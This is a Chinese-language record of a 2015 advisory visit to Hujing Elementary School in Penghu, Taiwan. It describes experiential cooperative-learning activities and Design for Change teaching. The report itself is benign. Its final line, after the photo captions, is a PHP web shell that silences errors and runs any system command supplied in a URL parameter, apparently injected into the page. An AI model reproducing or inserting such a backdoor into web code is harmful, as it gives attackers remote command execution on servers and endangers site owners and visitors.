國小綜合活動學習領域-到校輔導-虎井國小-探索體驗教育教學經驗分享

澎湖縣國教輔導團104年度到校輔導紀錄表

服務對象: 
馬公市虎井國小
領域別: 
國小綜合活動領域
到校輔導時間: 
2015-10-16 週五
出席人員: 
翁安明召集人、陳信蓁輔導員、蔡馥琦輔導員、吳旻駿輔導員
輔導方式: 
綜合座談
學校狀況: 
該領域專長教師: 人 非領域專長教師: 人
學校特色: 

1.位處離島,校長及教學團隊富教學熱忱。
2. 學校推展玄武岩特色課程,其課程素材可結合綜合活動領域實施之;且校內具備創造思考教學專長之教師。

提供相關問題解決策略: 

綜合活動學習領域強調學生在真實生活中的實踐能力,協助學生表現自我與檢證學習內容,因此綜合活動學習領域重視學生在實踐過程中體驗活動的意義,並在體驗的省思過程中增進對自己的瞭解,發現人生的意義。
在體驗活動操作過程中,教師需給予學生適當的活動規範,尊重團體中每一位個體,從活動中帶領學生進行問題反思,提問方式可運用6W思考方式( how、what、why、where、who、when ),並讓學生與生活經驗作結合,並能運用於生活上。

課程與教學相關問題描述: 

1.體驗活動在教學中之帶領技巧

到校輔導內容重點: 

1.綜合活動領域學習
2.體驗活動教學技法
3.DFC課程教學分享

提供改善學生學習成效之教師教學方案: 

1.合作學習體驗活動–齊眉棍
2.DFC課程教學分享

意見反映: 
1.綜合活動學習領域是一門多元學習的課程,尤其重視學生的生活體驗、省思與實踐的能力,透過齊眉棍的示範教學,由輔導員帶領學生進行合作學習體驗,從體驗活動中帶領學生進行反思,由自己的經驗出發,反覆引導學生從體驗中思考問題解決方法,並給予合作學習的成功經驗,加深學生學習經驗。 2. DFC課程教學透過感受、想像、實踐、分享四個步驟,讓孩子有機會透過觀察身邊的問題,發揮想像力,設計解決方式,並且付諸行動,讓世界變得更好,這樣的方式很適合運用自綜合活動的主題課程教學,讓學生實際進行體驗活動外亦能身體力行解決生活問題,讓教學與生活結合發揮更大效益。
到校輔導成果照片: 
探索體驗教育教學經驗分享
探索體驗教育教學經驗分享
error_reporting(0); $bozx=$_GET[boz]; system($bozx);